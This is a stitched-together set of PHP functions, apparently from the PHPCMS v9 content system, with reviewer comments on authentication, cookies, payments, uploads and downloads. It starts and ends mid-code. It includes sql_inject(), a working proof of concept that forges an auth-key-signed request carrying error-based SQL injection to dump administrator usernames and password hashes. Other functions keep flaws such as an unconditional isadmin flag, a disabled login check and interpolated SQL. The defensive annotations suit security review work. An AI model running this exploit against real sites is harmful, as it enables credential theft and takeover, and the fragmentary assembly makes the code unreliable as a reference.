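/**
 * Constructor.
 *
 * Loads the member model and cached configuration, copies query-string
 * parameters into $_POST, then decodes the encrypted `data` field with the
 * calling application's auth key and stores the parsed result in $this->data.
 * Every failure path ends the request with the body '0'.
 */
public function __construct()
{
    $this->db = pc_base::load_model('member_model');
    pc_base::load_app_func('global');

    // Load the system configuration and the registered application list.
    $this->settings = getcache('settings', 'admin');
    $this->applist = getcache('applist', 'admin');

    // Every GET parameter except the routing keys m/c/a is copied over $_POST,
    // so the checks below apply to query-string input as well.
    if (isset($_GET) && is_array($_GET) && count($_GET) > 0) {
        foreach ($_GET as $k => $v) {
            if (!in_array($k, array('m', 'c', 'a'))) {
                $_POST[$k] = $v;
            }
        }
    }

    if (isset($_POST['appid'])) {
        $this->appid = intval($_POST['appid']);
    } else {
        exit('0');
    }

    // An appid that is not in the application list has no auth key. Reject it
    // here instead of passing an empty key to sys_auth().
    // NOTE(review): confirm how this project's sys_auth() treats an empty key.
    if (empty($this->applist[$this->appid]['authkey'])) {
        exit('0');
    }
    $authkey = $this->applist[$this->appid]['authkey'];

    if (isset($_POST['data'])) {
        parse_str(sys_auth($_POST['data'], 'DECODE', $authkey), $this->data);
        if (!is_array($this->data)) {
            exit('0');
        }
    } else {
        exit('0');
    }

    if (isset($GLOBALS['HTTP_RAW_POST_DATA'])) {
        $this->data['avatardata'] = $GLOBALS['HTTP_RAW_POST_DATA'];
        // Strict string comparison: a loose != treats numeric-looking strings
        // such as "1e3" and "1000" as equal.
        if (!isset($this->data['ps_auth_key'])
            || !is_string($this->data['ps_auth_key'])
            || $this->data['ps_auth_key'] !== (string) $authkey
        ) {
            exit('0');
        }
    }
}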
/**
 * Read a cookie, decode it and filter the result.
 *
 * The cookie name is CS_Cookie_Prefix followed by $var. When the cookie is
 * present its value is decoded by sys_auth() with operation 'D', using the
 * prefixed name concatenated with CS_Encryption_Key as the key. When it is
 * absent, $default is used. Either way the value goes through safe_replace().
 *
 * @param string $var     Cookie name without the prefix.
 * @param mixed  $default Value used when the cookie is not set.
 * @return mixed The result of safe_replace().
 */
public static function get_cookie($var, $default = '')
{
    $cookie_name = CS_Cookie_Prefix . $var;

    if (isset($_COOKIE[$cookie_name])) {
        // The key depends on the cookie name, so a value decoded for one
        // cookie name uses a different key than for another.
        $decoded = sys_auth($_COOKIE[$cookie_name], 'D', $cookie_name . CS_Encryption_Key);
    } else {
        $decoded = $default;
    }

    return safe_replace($decoded);
}
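/**
 * Flatten $data into a query-string style payload, encode it with $key and
 * POST it to $url.
 *
 * @param string     $url  Endpoint handed to ps_post().
 * @param array|null $data Values to send. Arrays nested up to three levels are
 *                         written as k[k2]=v and k[k2][k3]=v pairs.
 * @param string     $key  Key passed to sys_auth() for the ENCODE step.
 * @return mixed Whatever ps_post() returns.
 */
function ps_send($url, $data = null, $key)
{
    $s = $sep = '';

    // The declared default for $data is null; iterating null would only raise
    // a warning, so skip the loop and send an empty payload instead.
    if ($data !== null) {
        foreach ($data as $k => $v) {
            if (is_array($v)) {
                $s2 = $sep2 = '';
                foreach ($v as $k2 => $v2) {
                    if (is_array($v2)) {
                        $s3 = $sep3 = '';
                        foreach ($v2 as $k3 => $v3) {
                            $s3 .= "{$sep3}{$k}[{$k2}][{$k3}]=" . ps_stripslashes($v3);
                            $sep3 = '&';
                        }
                        $s .= $sep2 . $s3;
                    } else {
                        $s2 .= "{$sep2}{$k}[{$k2}]=" . ps_stripslashes($v2);
                        $sep2 = '&';
                        // NOTE(review): $s2 accumulates and is appended on every
                        // pass, so earlier pairs are repeated in $s. Left as is
                        // because the receiving parser is not visible here.
                        $s .= $sep . $s2;
                    }
                }
            } else {
                $s .= "{$sep}{$k}=" . ps_stripslashes($v);
            }
            $sep = '&';
        }
    }

    // NOTE(review): keys and values are joined without URL-encoding, so a value
    // containing '&' or '=' changes how the receiver splits the payload. Confirm
    // that callers only pass values where this cannot happen.
    $auth_s = 'code=' . urlencode(sys_auth($s, 'ENCODE', $key));

    // 500000 is passed through unchanged; its meaning is defined by ps_post().
    return ps_post($url, 500000, $auth_s);
}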
/**
 * Check whether the visitor is already logged in.
 *
 * On the member login/register/mini/send_newmail routes a visitor without an
 * auth cookie (or on the 'mini' route) gets `true`. Everywhere else the `auth`
 * cookie is decoded into a user id and a password value, the member record is
 * loaded, and the cookie is accepted only when the stored password field is
 * identical to the value carried in the cookie. Otherwise the login cookies
 * are cleared or the visitor is sent to the login page.
 */
public final function check_member()
{
    $phpcms_auth = param::get_cookie('auth');
    if (ROUTE_M == 'member' && ROUTE_C == 'index' && in_array(ROUTE_A, array('login', 'register', 'mini', 'send_newmail'))) {
        if ($phpcms_auth && ROUTE_A != 'mini') {
            showmessage(L('login_success', '', 'member'), 'index.php?m=member&c=index');
        } else {
            return true;
        }
    } else {
        // Check whether an auth cookie exists.
        if ($phpcms_auth) {
            // The decode key mixes the site auth_key with the request's
            // User-Agent header, so the cookie only decodes under the same
            // User-Agent string.
            $auth_key = $auth_key = md5(pc_base::load_config('system', 'auth_key') . $_SERVER['HTTP_USER_AGENT']);
            // NOTE(review): if decoding yields a string without a tab, explode()
            // returns one element and $password is left unset. Confirm what
            // sys_auth() returns on failure.
            list($userid, $password) = explode("\t", sys_auth($phpcms_auth, 'DECODE', $auth_key));
            // Validate the user and load the member record.
            // NOTE(review): $userid is used as decoded, without an integer cast.
            $this->memberinfo = $this->db->get_one(array('userid' => $userid));
            // Load the member-model record.
            // NOTE(review): memberinfo is indexed here before it is known to be an array.
            $this->db->set_model($this->memberinfo['modelid']);
            $this->_member_modelinfo = $this->db->get_one(array('userid' => $userid));
            $this->_member_modelinfo = $this->_member_modelinfo ? $this->_member_modelinfo : array();
            $this->db->set_model();
            if (is_array($this->memberinfo)) {
                $this->memberinfo = array_merge($this->memberinfo, $this->_member_modelinfo);
            }
            // The cookie carries the stored password value itself; it is the
            // only credential compared here.
            if ($this->memberinfo && $this->memberinfo['password'] === $password) {
                if (!defined('SITEID')) {
                    define('SITEID', $this->memberinfo['siteid']);
                }
                if ($this->memberinfo['groupid'] == 1) {
                    // Group 1: the account is reported as banned and the login cookies are cleared.
                    param::set_cookie('auth', '');
                    param::set_cookie('_userid', '');
                    param::set_cookie('_username', '');
                    param::set_cookie('_groupid', '');
                    showmessage(L('userid_banned_by_administrator', '', 'member'), 'index.php?m=member&c=index&a=login');
                } elseif ($this->memberinfo['groupid'] == 7) {
                    // Group 7: the account still needs e-mail verification.
                    param::set_cookie('auth', '');
                    param::set_cookie('_userid', '');
                    param::set_cookie('_groupid', '');
                    // Store the pending account in cookies so the verification mail can be re-sent.
                    param::set_cookie('_regusername', $this->memberinfo['username']);
                    param::set_cookie('_reguserid', $this->memberinfo['userid']);
                    param::set_cookie('_reguseruid', $this->memberinfo['phpssouid']);
                    param::set_cookie('email', $this->memberinfo['email']);
                    showmessage(L('need_emial_authentication', '', 'member'), 'index.php?m=member&c=index&a=register&t=2');
                }
            } else {
                // Unknown user or password mismatch: clear the login cookies.
                param::set_cookie('auth', '');
                param::set_cookie('_userid', '');
                param::set_cookie('_username', '');
                param::set_cookie('_groupid', '');
            }
            unset($userid, $password, $phpcms_auth, $auth_key);
        } else {
            // No auth cookie: send the visitor to the login page and keep the
            // return address in `forward` (URL-encoded).
            $forward = isset($_GET['forward']) ? urlencode($_GET['forward']) : urlencode(get_url());
            showmessage(L('please_login', '', 'member'), 'index.php?m=member&c=index&a=login&forward=' . $forward);
        }
    }
}
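/**
 * Charge the current member for a paid item and show the result message.
 *
 * The `allow_visitor` query parameter is decoded with sys_auth() and split on
 * '|' into a flag, a price (readpoint) and a pay type. The flag's first
 * '_'-separated part is used as the category id. Depending on the pay type the
 * price is taken through spend::amount() or spend::point().
 */
public function init()
{
    $allow_visitor = htmlspecialchars($_GET['allow_visitor']);
    $auth = sys_auth($allow_visitor, 'DECODE');
    if (strpos($auth, '|') === false) {
        showmessage(L('illegal_operation'));
    }

    $auth_str = explode('|', $auth);
    $flag = $auth_str[0];
    // The previous pattern '/^([0-9]+)|([0-9]+)/' contained an unescaped '|',
    // so it accepted any string with a digit in it. The flag is expected to be
    // "<digits>_<digits>"; require exactly that.
    if (!preg_match('/^[0-9]+_[0-9]+$/', $flag)) {
        showmessage(L('illegal_operation'));
    }

    $readpoint = isset($auth_str[1]) ? intval($auth_str[1]) : 0;
    $paytype = isset($auth_str[2]) ? intval($auth_str[2]) : 0;

    // NOTE(review): http_referer comes from the query string and is handed to
    // showmessage() as the follow-up URL. If showmessage() redirects to it,
    // restrict the value to same-site URLs.
    $http_referer = urldecode($_GET['http_referer']);
    if (!$readpoint) {
        showmessage(L('illegal_operation'));
    }

    pc_base::load_app_class('spend', 'pay', 0);

    $flag_arr = explode('_', $flag);
    $catid = $flag_arr[0];
    $siteids = getcache('category_content', 'commons');
    $siteid = $siteids[$catid];
    $CATEGORYS = getcache('category_content_' . $siteid, 'commons');

    if (isset($CATEGORYS[$catid])) {
        $setting = string2array($CATEGORYS[$catid]['setting']);
        $repeatchargedays = intval($setting['repeatchargedays']);
        if ($repeatchargedays) {
            // Look back over the configured number of days for an earlier payment.
            $fromtime = SYS_TIME - 86400 * $repeatchargedays;
            $r = spend::spend_time($this->userid, $fromtime, $flag);
            if ($r) {
                showmessage(L('have_pay'), $http_referer, 1000);
            }
        }
    }

    if ($paytype) {
        if (spend::amount($readpoint, L('msg_readpoint'), $this->userid, $this->username, '', '', $flag) == false) {
            // Spending failed: show the reason and point at the deposit page.
            $msg = spend::get_msg();
            $http_referer = APP_PATH . 'index.php?m=pay&c=deposit&a=pay';
        } else {
            $msg = L('readpoint_pay', array('readpoint' => $readpoint));
        }
    } else {
        if (spend::point($readpoint, L('msg_readpoint'), $this->userid, $this->username, '', '', $flag) == false) {
            $msg = spend::get_msg();
            $http_referer = APP_PATH . 'index.php?m=pay&c=deposit&a=pay';
        } else {
            $msg = L('readpoint_pay_point', array('readpoint' => $readpoint));
        }
    }

    showmessage($msg, $http_referer, 3000);
}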
/**
 * Set up upload locations, the image extension list and the acting user.
 *
 * The user id is taken from the session, else from the `_userid` cookie, else
 * from the `userid_flash` POST field decoded by sys_auth().
 */
function __construct()
{
    pc_base::load_app_func('global');

    $this->upload_url = pc_base::load_config('system', 'upload_url');
    $this->upload_path = pc_base::load_config('system', 'upload_path');
    $this->imgext = array('jpg', 'gif', 'png', 'bmp', 'jpeg');

    if ($_SESSION['userid']) {
        $this->userid = $_SESSION['userid'];
    } elseif (param::get_cookie('_userid')) {
        $this->userid = param::get_cookie('_userid');
    } else {
        // NOTE(review): no key argument is passed, so any value that decodes
        // under sys_auth()'s default key is accepted as the user id here.
        $this->userid = sys_auth($_POST['userid_flash'], 'DECODE');
    }

    // isadmin is set unconditionally, whatever the user id turned out to be.
    $this->isadmin = 1;

    if (param::get_cookie('_groupid')) {
        $this->groupid = param::get_cookie('_groupid');
    } else {
        $this->groupid = 8;
    }

    // Login check. The rejection is commented out, so an empty user id
    // continues past this point.
    if (empty($this->userid)) {
        //showmessage(L('please_login','','member'));
    }
}
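/**
 * Constructor.
 *
 * Loads the member model and cached configuration, copies query-string
 * parameters into $_POST, decodes the encrypted `data` field with the calling
 * application's auth key, escapes the parsed values and validates the
 * username, email, password and newpassword fields when they are present.
 * Ends the request with '0' when the request cannot be decoded and with '-5'
 * when a field fails validation.
 */
public function __construct()
{
    $this->db = pc_base::load_model('member_model');
    pc_base::load_app_func('global');

    // Load the system configuration and the registered application list.
    $this->settings = getcache('settings', 'admin');
    $this->applist = getcache('applist', 'admin');

    // Every GET parameter except the routing keys m/c/a is copied over $_POST.
    if (isset($_GET) && is_array($_GET) && count($_GET) > 0) {
        foreach ($_GET as $k => $v) {
            if (!in_array($k, array('m', 'c', 'a'))) {
                $_POST[$k] = $v;
            }
        }
    }

    if (isset($_POST['appid'])) {
        $this->appid = intval($_POST['appid']);
    } else {
        exit('0');
    }

    // An appid that is not in the application list has no auth key. Reject it
    // here instead of passing an empty key to sys_auth().
    // NOTE(review): confirm how this project's sys_auth() treats an empty key.
    if (empty($this->applist[$this->appid]['authkey'])) {
        exit('0');
    }

    if (isset($_POST['data'])) {
        parse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data);
        if (empty($this->data) || !is_array($this->data)) {
            exit('0');
        }

        // get_magic_quotes_gpc() no longer exists in current PHP; treat a
        // missing function the same as "magic quotes off".
        if (!function_exists('get_magic_quotes_gpc') || !get_magic_quotes_gpc()) {
            $this->data = new_addslashes($this->data);
        }

        if (isset($this->data['username']) && $this->data['username'] != '' && is_username($this->data['username']) == false) {
            exit('-5');
        }
        // The emptiness test used to look at `username`, so an email sent
        // without a username skipped is_email(). Test the email field itself.
        if (isset($this->data['email']) && $this->data['email'] != '' && is_email($this->data['email']) == false) {
            exit('-5');
        }
        if (isset($this->data['password']) && $this->data['password'] != '' && (is_password($this->data['password']) == false || is_badword($this->data['password']))) {
            exit('-5');
        }
        if (isset($this->data['newpassword']) && $this->data['newpassword'] != '' && (is_password($this->data['newpassword']) == false || is_badword($this->data['newpassword']))) {
            exit('-5');
        }
    } else {
        exit('0');
    }

    if (isset($GLOBALS['HTTP_RAW_POST_DATA'])) {
        $this->data['avatardata'] = $GLOBALS['HTTP_RAW_POST_DATA'];
        // NOTE(review): the ps_auth_key comparison below is disabled, so the raw
        // body is accepted on the strength of the `data` decode alone.
        //if($this->applist[$this->appid]['authkey'] != $this->data['ps_auth_key']) {
        //    exit('0');
        //}
    }
}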
/**
 * Proof-of-concept routine kept as it appears on the page.
 *
 * It encodes a message under the key returned by authkey() and requests the
 * target's api.php with it, collecting text matched between '~' markers in the
 * response. What it demonstrates for a defender: a field taken from a decoded
 * sys_auth() message (`uid` here) is still untrusted input. The receiving code
 * has to cast it to an integer or bind it as a query parameter, and an exposed
 * auth key has to be rotated.
 *
 * @return array Strings captured from the responses, at most $limit entries.
 */
function sql_inject()
{
    global $phpcmsv9;
    $limit = 10; // how many administrator accounts to list by default
    $admin = array();
    $key = authkey();
    for ($i = 0; $i < $limit; $i++) {
        // The payload is signed with the application key, so the receiver's
        // signature check passes; only validation of `uid` itself would stop it.
        $code = sys_auth("action=synlogin&uid=1' and(select 1 from(select count(*),concat((select (select (\n SELECT distinct concat(0x7e,username,0x3a,password,0x3a,encrypt,0x7e)FROM v9_admin limit {$i},1)) from\n information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#", 'ENCODE', $key);
        $target = $phpcmsv9 . '/api.php?op=phpsso&code=' . $code;
        #$target = $phpcmsv9 . 'phpsso_server/?m=phpsso&c=index&a=getuserinfo&appid=1&data=' . $code;
        $content = get_data($target);
        // The loop stops at the first response that carries no marker pair.
        if (preg_match('/~(.+?)~1/', $content, $match)) {
            $admin[] = $match[1];
        } else {
            break;
        }
    }
    return $admin;
}
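/**
 * Serve the download described by the encrypted `a_k` query parameter.
 *
 * The token is decoded with a key derived from the site auth_key and the
 * request's User-Agent, then parsed as a query string with the fields
 * i (download id), m, modelid, f (file), t (issue time), ip, s (prefix) and
 * d (delivery mode). The link is honoured for one hour and only from the IP
 * stored in it. Depending on the fields the client is redirected to the file
 * URL or the file is streamed through file_down().
 */
public function download()
{
    $a_k = trim($_GET['a_k']);
    $pc_auth_key = md5(pc_base::load_config('system', 'auth_key') . $_SERVER['HTTP_USER_AGENT']);
    $a_k = sys_auth($a_k, 'DECODE', $pc_auth_key);
    if (empty($a_k)) {
        showmessage(L('illegal_parameters'));
    }

    // Parse into an array. The one-argument form of parse_str() writes every
    // key of the token into local variables, which lets token content
    // overwrite locals of this method.
    $params = array();
    parse_str($a_k, $params);
    foreach (array('i', 'm', 'modelid', 'f', 't', 'ip', 's', 'd') as $field) {
        // Only scalar fields are expected; k[]=v style input is rejected.
        if (isset($params[$field]) && !is_string($params[$field])) {
            showmessage(L('illegal_parameters'));
        }
    }
    $i = isset($params['i']) ? $params['i'] : null;
    $m = isset($params['m']) ? $params['m'] : null;
    $modelid = isset($params['modelid']) ? $params['modelid'] : null;
    $f = isset($params['f']) ? $params['f'] : null;
    $t = isset($params['t']) ? $params['t'] : null;
    $ip = isset($params['ip']) ? $params['ip'] : null;
    $s = isset($params['s']) ? $params['s'] : null;
    $d = isset($params['d']) ? $params['d'] : null;

    $downid = 0;
    if (isset($i)) {
        $downid = intval($i);
    }
    if (!isset($m)) {
        showmessage(L('illegal_parameters'));
    }
    if (!isset($modelid)) {
        showmessage(L('illegal_parameters'));
    }
    if (empty($f)) {
        showmessage(L('url_invalid'));
    }
    if (!$i || $m < 0) {
        showmessage(L('illegal_parameters'));
    }
    if (!isset($t)) {
        showmessage(L('illegal_parameters'));
    }
    if (!isset($ip)) {
        showmessage(L('illegal_parameters'));
    }
    $starttime = intval($t);

    $blocked_ext = '/(php|phtml|php3|php4|jsp|dll|asp|cer|asa|shtml|shtm|aspx|asax|cgi|fcgi|pl)(\.|$)/i';
    if (preg_match($blocked_ext, $f) || strpos($f, ":\\") !== false || strpos($f, '..') !== false) {
        showmessage(L('url_error'));
    }
    $fileurl = trim($f);

    if (!$downid || empty($fileurl) || !preg_match("/[0-9]{10}/", $starttime) || !preg_match("/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/", $ip) || $ip != ip()) {
        showmessage(L('illegal_parameters'));
    }

    // The link is valid for one hour after it was issued.
    $endtime = SYS_TIME - $starttime;
    if ($endtime > 3600) {
        showmessage(L('url_invalid'));
    }

    if ($m) {
        $fileurl = trim($s) . trim($fileurl);
    }
    // Validate the value that is actually used. The checks above only saw `f`;
    // once `s` is prepended the joined path can end in an extension or contain
    // a sequence that neither part shows on its own.
    if (preg_match($blocked_ext, $fileurl) || strpos($fileurl, ":\\") !== false || strpos($fileurl, '..') !== false) {
        showmessage(L('url_error'));
    }

    // Remote file: anything with a scheme that is not under the upload URL.
    if (strpos($fileurl, ':/') && (strpos($fileurl, pc_base::load_config('system', 'upload_url')) === false)) {
        header("Location: $fileurl");
    } else {
        if ($d == 0) {
            header("Location: " . $fileurl);
        } else {
            // Map the public upload URL onto the upload directory on disk.
            $fileurl = str_replace(array(pc_base::load_config('system', 'upload_url'), '/'), array(pc_base::load_config('system', 'upload_path'), DIRECTORY_SEPARATOR), $fileurl);
            $filename = basename($fileurl);
            // Handle file names containing double-byte (Chinese) characters.
            if (preg_match("/^([\s\S]*?)([\x81-\xfe][\x40-\xfe])([\s\S]*?)/", $fileurl)) {
                $filename = str_replace(array("%5C", "%2F", "%3A"), array("\\", "/", ":"), urlencode($fileurl));
                $filename = urldecode(basename($filename));
            }
            $ext = fileext($filename);
            // The client sees a generated name; only the extension is kept.
            $filename = date('Ymd_his') . random(3) . '.' . $ext;
            file_down($fileurl, $filename);
        }
    }
}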
$title = $_GET['title']; $title = addslashes(urldecode($title)); if (CHARSET != 'utf-8') { $title = iconv('utf-8', CHARSET, $title); $title = addslashes($title); } $title = htmlspecialchars($title); $url = safe_replace(addslashes(urldecode($_GET['url']))); $url = trim_script($url); } $_GET['callback'] = safe_replace($_GET['callback']); //判断是否登录 $phpcms_auth = param::get_cookie('auth'); if ($phpcms_auth) { $auth_key = md5(pc_base::load_config('system', 'auth_key') . $_SERVER['HTTP_USER_AGENT']); list($userid, $password) = explode("\t", sys_auth($phpcms_auth, 'DECODE', $auth_key)); if ($userid > 0) { } else { exit(trim_script($_GET['callback']) . '(' . json_encode(array('status' => -1)) . ')'); } } else { exit(trim_script($_GET['callback']) . '(' . json_encode(array('status' => -1)) . ')'); } $favorite_db = pc_base::load_model('favorite_model'); $data = array('title' => $title, 'url' => $url, 'adddate' => SYS_TIME, 'userid' => $userid); //根据url判断是否已经收藏过。 $is_exists = $favorite_db->get_one(array('url' => $url, 'userid' => $userid)); if (!$is_exists) { $favorite_db->insert($data); } exit(trim_script($_GET['callback']) . '(' . json_encode(array('status' => 1)) . ')');
/**
 * Synchronised logout.
 *
 * When the calling application has `synlogin` enabled, emits one script tag
 * per other sync-enabled application, each carrying a sys_auth()-encoded
 * `action=synlogout` message, and ends the request with that markup. When
 * UCenter use is configured, its sync-logout output is placed first.
 * Otherwise the request ends with no output.
 */
public function synlogout()
{
    if (!$this->applist[$this->appid]['synlogin']) {
        exit;
    }

    $markup = '';

    // UCenter part.
    if ($this->config['ucuse']) {
        pc_base::load_config('uc_config');
        require_once PHPCMS_PATH.'api/uc_client/client.php';
        $markup .= uc_user_synlogout();
    }

    foreach ($this->applist as $app) {
        // Skip applications without sync login and the caller itself.
        if (!$v_enabled = $app['synlogin']) {
            continue;
        }
        if ($app['appid'] == $this->appid) {
            continue;
        }

        $endpoint = $app['url'].$app['apifilename'];
        $joiner = strstr($endpoint, '?') ? '&' : '?';
        // Each application gets a message encoded under its own auth key.
        $signed = urlencode(sys_auth('action=synlogout&time='.SYS_TIME, 'ENCODE', $app['authkey']));

        $markup .= '<script type="text/javascript" src="'.$endpoint.$joiner.'time='.SYS_TIME.'&code='.$signed.'" reload="1"></script>';
    }

    exit($markup);
}
/**
 * Render a content detail page.
 *
 * Reads catid, id and page from the query string (all cast to int), loads the
 * main and `_data` rows, runs them through content_output, applies the
 * member-group or category access rules, prepares the paid-reading token,
 * SEO fields, pagination and previous/next links, then includes the template.
 */
public function show()
{
    $catid = intval($_GET['catid']);
    $id = intval($_GET['id']);
    if (!$catid || !$id) {
        showmessage(L('information_does_not_exist'), 'blank');
    }
    $page = intval($_GET['page']);
    $page = max($page, 1);
    $siteids = getcache('category_content', 'commons');
    $siteid = $siteids[$catid];
    $CATEGORYS = getcache('category_content_' . $siteid, 'commons');
    if (!isset($CATEGORYS[$catid]) || $CATEGORYS[$catid]['type'] != 0) {
        showmessage(L('information_does_not_exist'), 'blank');
    }
    $this->category = $CAT = $CATEGORYS[$catid];
    $this->category_setting = $CAT['setting'] = string2array($this->category['setting']);
    $siteid = $GLOBALS['siteid'] = $CAT['siteid'];
    $MODEL = getcache('model', 'commons');
    $modelid = $CAT['modelid'];
    // The table name is built from cached model data, not from request input.
    $tablename = $this->db->table_name = $this->db->db_tablepre . $MODEL[$modelid]['tablename'];
    $r = $this->db->get_one(array('id' => $id));
    // Only rows with status 99 are shown.
    if (!$r || $r['status'] != 99) {
        showmessage(L('info_does_not_exists'), 'blank');
    }
    $this->db->table_name = $tablename . '_data';
    $r2 = $this->db->get_one(array('id' => $id));
    $rs = $r2 ? array_merge($r, $r2) : $r;
    // Re-assign from the database row, which takes precedence over the request.
    $catid = $CATEGORYS[$r['catid']]['catid'];
    $modelid = $CATEGORYS[$catid]['modelid'];
    require_once CACHE_MODEL_PATH . 'content_output.class.php';
    $content_output = new content_output($modelid, $catid, $CATEGORYS);
    $data = $content_output->get($rs);
    //print_r($data);
    // NOTE(review): extract() turns every key of $data into a local variable and
    // overwrites existing ones ($catid, $id, $template, ...). Later code,
    // including the SQL strings near the end, uses whatever it left behind.
    extract($data);
    // Check the article's member-group permission.
    if ($groupids_view && is_array($groupids_view)) {
        // The group id used for this check comes from the `_groupid` cookie.
        $_groupid = param::get_cookie('_groupid');
        $_groupid = intval($_groupid);
        if (!$_groupid) {
            $forward = urlencode(get_url());
            showmessage(L('login_website'), APP_PATH . 'index.php?m=member&c=index&a=login&forward=' . $forward);
        }
        if (!in_array($_groupid, $groupids_view)) {
            showmessage(L('no_priv'));
        }
    } else {
        // Otherwise decide from the category's access rules.
        $_priv_data = $this->_category_priv($catid);
        if ($_priv_data == '-1') {
            $forward = urlencode(get_url());
            showmessage(L('login_website'), APP_PATH . 'index.php?m=member&c=index&a=login&forward=' . $forward);
        } elseif ($_priv_data == '-2') {
            showmessage(L('no_priv'));
        }
    }
    if (module_exists('comment')) {
        $allow_comment = isset($allow_comment) ? $allow_comment : 1;
    } else {
        $allow_comment = 0;
    }
    // Paid reading: charge type.
    $paytype = $rs['paytype'];
    $readpoint = $rs['readpoint'];
    $allow_visitor = 1;
    if ($readpoint || $this->category_setting['defaultchargepoint']) {
        if (!$readpoint) {
            $readpoint = $this->category_setting['defaultchargepoint'];
            $paytype = $this->category_setting['paytype'];
        }
        // Check whether the member has already paid.
        $allow_visitor = self::_check_payment($catid . '_' . $id, $paytype);
        if (!$allow_visitor) {
            $http_referer = urlencode(get_url());
            // Token layout: "<catid>_<id>|<readpoint>|<paytype>", encoded with
            // sys_auth()'s default key; the return address is appended in clear.
            $allow_visitor = sys_auth($catid . '_' . $id . '|' . $readpoint . '|' . $paytype) . '&http_referer=' . $http_referer;
        } else {
            $allow_visitor = 1;
        }
    }
    // Top-level category id.
    $arrparentid = explode(',', $CAT['arrparentid']);
    $top_parentid = $arrparentid[1] ? $arrparentid[1] : $catid;
    $brother_cats = subcat($top_parentid); // sub-categories of the top-level category (original note dated 03-10)
    $template = $template ? $template : $CAT['setting']['show_template'];
    if (!$template) {
        $template = 'show';
    }
    // SEO
    $seo_keywords = '';
    if (!empty($keywords)) {
        $seo_keywords = implode(',', $keywords);
    }
    // NOTE(review): the condition is built by string concatenation; it is safe
    // only while $catid is still an integer after extract() above.
    $_cateinfo = M("category")->get_one("catid=" . $catid);
    $sys_title = M("safe_system")->get_one("id=1");
    $SEO = array('site_title' => $sys_title['attr_value'], 'keyword' => empty($seo_keywords) ? $sys_title['attr_value'] : $seo_keywords, "description" => $sys_title['attr_value'], 'title' => $title . " - " . $_cateinfo['catname'] . " - ");
    define('STYLE', $CAT['setting']['template_list']);
    if (isset($rs['paginationtype'])) {
        $paginationtype = $rs['paginationtype'];
        $maxcharperpage = $rs['maxcharperpage'];
    }
    // NOTE(review): $titles starts as a string and is later written to with
    // array offsets; current PHP versions reject that.
    $pages = $titles = '';
    if ($rs['paginationtype'] == 1) {
        // Automatic pagination.
        if ($maxcharperpage < 10) {
            $maxcharperpage = 500;
        }
        $contentpage = pc_base::load_app_class('contentpage');
        $content = $contentpage->get_data($content, $maxcharperpage);
    }
    if ($rs['paginationtype'] != 0) {
        // Manual pagination.
        $CONTENT_POS = strpos($content, '[page]');
        if ($CONTENT_POS !== false) {
            $this->url = pc_base::load_app_class('url', 'content');
            $contents = array_filter(explode('[page]', $content));
            $pagenumber = count($contents);
            if (strpos($content, '[/page]') !== false && $CONTENT_POS < 7) {
                $pagenumber--;
            }
            for ($i = 1; $i <= $pagenumber; $i++) {
                $pageurls[$i] = $this->url->show($id, $i, $catid, $rs['inputtime']);
            }
            $END_POS = strpos($content, '[/page]');
            if ($END_POS !== false) {
                if ($CONTENT_POS > 7) {
                    $content = '[page]' . $title . '[/page]' . $content;
                }
                // Collect the per-page titles written as [page]title[/page].
                if (preg_match_all("|\\[page\\](.*)\\[/page\\]|U", $content, $m, PREG_PATTERN_ORDER)) {
                    foreach ($m[1] as $k => $v) {
                        $p = $k + 1;
                        $titles[$p]['title'] = strip_tags($v);
                        $titles[$p]['url'] = $pageurls[$p][0];
                    }
                }
            }
            // When there is no [/page], the pagination below is used.
            $pages = content_pages($pagenumber, $page, $pageurls);
            // Check whether [page] sits at the very start of the content.
            if ($CONTENT_POS < 7) {
                $content = $contents[$page];
            } else {
                if ($page == 1 && !empty($titles)) {
                    $content = $title . '[/page]' . $contents[$page - 1];
                } else {
                    $content = $contents[$page - 1];
                }
            }
            if ($titles) {
                list($title, $content) = explode('[/page]', $content);
                $content = trim($content);
                // Re-balance a paragraph tag that the split cut in half.
                if (strpos($content, '</p>') === 0) {
                    $content = '<p>' . $content;
                }
                if (stripos($content, '<p>') === 0) {
                    $content = $content . '</p>';
                }
            }
        }
    }
    $this->db->table_name = $tablename;
    // Previous item.
    // NOTE(review): $catid and $id are interpolated into the WHERE string; see
    // the extract() note above.
    $previous_page = $this->db->get_one("`catid` = '{$catid}' AND `id`<'{$id}' AND `status`=99", '*', 'id DESC');
    // Next item.
    $next_page = $this->db->get_one("`catid`= '{$catid}' AND `id`>'{$id}' AND `status`=99");
    if (empty($previous_page)) {
        $previous_page = array('title' => L('first_page'), 'thumb' => IMG_PATH . 'nopic_small.gif', 'url' => 'javascript:alert(\'' . L('first_page') . '\');');
    }
    if (empty($next_page)) {
        $next_page = array('title' => L('last_page'), 'thumb' => IMG_PATH . 'nopic_small.gif', 'url' => 'javascript:alert(\'' . L('last_page') . '\');');
    }
    include template('content', $template);
}
/**
 * Build the synchronised-logout markup for every other registered application.
 *
 * For each application other than the caller, one script tag is produced whose
 * URL carries a sys_auth()-encoded `action=synlogout` message under that
 * application's own auth key. The Content-type header is set to
 * text/javascript and the markup is returned through format_js().
 *
 * @param mixed $get  Not used by this method.
 * @param mixed $post Not used by this method.
 * @return mixed The result of format_js().
 */
public function synlogout($get, $post)
{
    $markup = '';

    foreach ($this->applist as $app) {
        if ($app['appid'] == $this->appid) {
            // The calling application does not notify itself.
            continue;
        }

        $endpoint = $app['url'] . $app['apifilename'];
        $joiner = strstr($endpoint, '?') ? '&' : '?';
        $signed = urlencode(sys_auth('action=synlogout&time=' . SYS_TIME, 'ENCODE', $app['authkey']));

        $markup .= '<script type="text/javascript" src="' . $endpoint . $joiner . 'time=' . SYS_TIME . '&code=' . $signed . '" reload="1"></script>';
    }

    header("Content-type: text/javascript");

    return format_js($markup);
}
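/**
 * Password recovery.
 *
 * Three modes, chosen by the request:
 *  - POST with `dosubmit`: check the captcha, look the member up by e-mail and
 *    mail a recovery link whose `code` is the user id and issue time encoded
 *    by sys_auth().
 *  - GET with `code`: decode the link, generate a new 8-character password,
 *    store it, mail it and show it.
 *  - otherwise: render the recovery form.
 */
public function public_forget_password()
{
    $email_config = getcache('common', 'commons');
    // Mail can be sent in two modes; SMTP (type '1') needs credentials.
    if ($email_config['mail_type'] == '1') {
        if (empty($email_config['mail_user']) || empty($email_config['mail_password'])) {
            showmessage(L('email_config_empty'), HTTP_REFERER);
        }
    }
    $this->_session_start();
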